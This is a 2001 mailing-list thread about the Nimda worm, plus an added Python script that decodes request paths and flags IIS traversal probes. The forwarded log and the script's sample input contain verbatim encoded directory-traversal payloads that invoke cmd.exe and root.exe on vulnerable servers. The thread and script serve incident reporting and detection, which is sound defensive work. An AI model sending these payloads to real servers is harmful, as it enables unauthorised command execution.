It's all over the news. The W32/Nimda worm (admin backwards). Feel free to
read all about it. It's caused massive headaches all day today.

http://www.cert.org/advisories/CA-2001-26.html

"Patrick Coomans" <[EMAIL PROTECTED]> on 09/18/2001 05:35:36 PM

To:   [EMAIL PROTECTED]
cc:   (bcc: Harley S. Sanders/BAIS/BAReston)
Subject:  [FW1] New worm on the road?

Since this evening I am experiencing massive attacks on HTTP (IIS oriented
I presume) from many different IP addresses.
They all look like:

GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/root.exe?/c+dir HTTP/1.0
GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0

Is anyone aware that this is some new kind of worm?

Now my FW1 question: can I create a HTTP resource (secure server) that
blocks all requests that e.g. have a .EXE in it? Or would that slow
my FW1's down too much?

Any other suggestions for good products that can do HTTP content inspection
and that cooperate or can co-exist with fw1?

Thanks,
Patrick
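Patrick's question is whether a content-inspection rule that blocks any request containing ".EXE" is the right filter. The probe lines above show why a literal-substring rule is the wrong shape: the traversal is hidden behind double percent-encoding (%255c decodes to %5c and only then to a backslash) and overlong UTF-8 (%c0%af for "/", %c1%1c and %c1%9c for "\"), while a substring rule would also block every legitimately hosted .exe download. The script below is an added example for this thread, not code from either post or from any firewall product. It canonicalises the request path the way a lenient server-side decoder would (the overlong-UTF-8 handling is a model of that behaviour, an assumption of the example), resolves the ".." segments, and flags requests that climb above the virtual root or ask for a command shell. The sample input is a selection of the probe lines quoted above plus two constructed benign requests; the function and constant names are the example's own.

```python
"""Canonicalise HTTP request targets and flag Nimda-style IIS traversal probes.

Added example for this thread, not code from the original posts. It feeds a
handful of request lines (probe lines quoted in the thread plus two constructed
benign ones) through a decoder that mimics the lenient behaviour the probes
rely on, then flags traversal above the virtual root or a request for a
command shell, and compares that with a plain ".exe" substring rule.
"""
import re
from urllib.parse import unquote_to_bytes

# "METHOD target HTTP/x.y" as it appears in an access log or on the wire.
REQUEST_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")

# Binaries the probes in the thread try to invoke (cmd.exe, and the root.exe
# copy of it left behind by an earlier infection). Constructed for the example.
SHELL_BINARIES = frozenset({"cmd.exe", "root.exe"})


def _decode_overlong(data: bytes) -> bytes:
    """Model a decoder that accepts overlong two-byte UTF-8 (lead byte 0xC0/0xC1).

    Such a sequence encodes a plain ASCII code point, so a strict decoder rejects
    it; a lenient one yields the ASCII byte: c0 af -> '/', c1 1c -> '\\'.
    This mirrors the server behaviour the probes depend on (assumption).
    """
    out = bytearray()
    i = 0
    while i < len(data):
        lead = data[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(((lead & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(lead)
            i += 1
    return bytes(out)


def canonicalize(path: str, max_rounds: int = 4) -> str:
    """Percent-decode and overlong-decode until the path stops changing.

    One round turns %255c into %5c, the next turns %5c into a backslash; the
    %%35%63 and %25%35%63 spellings in the thread collapse the same way.
    Backslashes are then folded into forward slashes.
    """
    data = path.encode("latin-1", "replace")
    for _ in range(max_rounds):
        decoded = _decode_overlong(unquote_to_bytes(data))
        if decoded == data:
            break
        data = decoded
    return data.decode("latin-1").replace("\\", "/")


def walk(canonical: str):
    """Resolve '.' and '..' segments; report whether the path climbed above root."""
    segments, escaped = [], False
    for seg in canonical.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            else:
                escaped = True
            continue
        segments.append(seg)
    return escaped, segments


def assess(request_line: str) -> dict:
    """Classify one request line under both the naive '.exe' rule and the
    canonicalising rule so the two can be compared."""
    m = REQUEST_RE.match(request_line.strip())
    if not m:
        return {"parsed": False, "naive_exe": False, "suspicious": False, "reasons": []}
    path = m.group("target").partition("?")[0]
    canonical = canonicalize(path)
    escaped, segments = walk(canonical)
    basename = segments[-1].lower() if segments else ""
    reasons = []
    if escaped:
        reasons.append("traversal above virtual root")
    if basename in SHELL_BINARIES:
        reasons.append("request for " + basename)
    return {
        "parsed": True,
        "canonical": canonical,
        "naive_exe": ".exe" in path.lower(),
        "suspicious": bool(reasons),
        "reasons": reasons,
    }


# Sample input: probe lines quoted in the thread plus two constructed benign requests.
SAMPLE_REQUESTS = [
    "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/root.exe?/c+dir HTTP/1.0",
    "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /downloads/setup.exe HTTP/1.0",  # constructed: a legitimate .exe download
    "GET /index.html HTTP/1.0",           # constructed: an ordinary page
]


def summarize(lines=SAMPLE_REQUESTS) -> dict:
    """Count what a '.exe' substring block would stop (including what it stops
    wrongly) against what the canonical traversal/shell check flags."""
    results = [assess(line) for line in lines]
    return {
        "naive_blocked": sum(r["naive_exe"] for r in results),
        "suspicious": sum(r["suspicious"] for r in results),
        "false_positives_naive": sum(r["naive_exe"] and not r["suspicious"] for r in results),
    }


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        r = assess(line)
        print(("ALERT " if r["suspicious"] else "ok    ") + line)
        if r["suspicious"]:
            print("      canonical:", r["canonical"], "|", "; ".join(r["reasons"]))
    print(summarize())
```

On the sample the substring rule blocks eight of nine lines, including the constructed setup.exe download, while the canonicalising check flags the seven probes and nothing else. The design point for a firewall or inspection proxy is that the rule must run on the decoded, normalised path, not on the raw bytes, and that "climbs above the virtual root" is a property worth alerting on regardless of what file name follows it.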
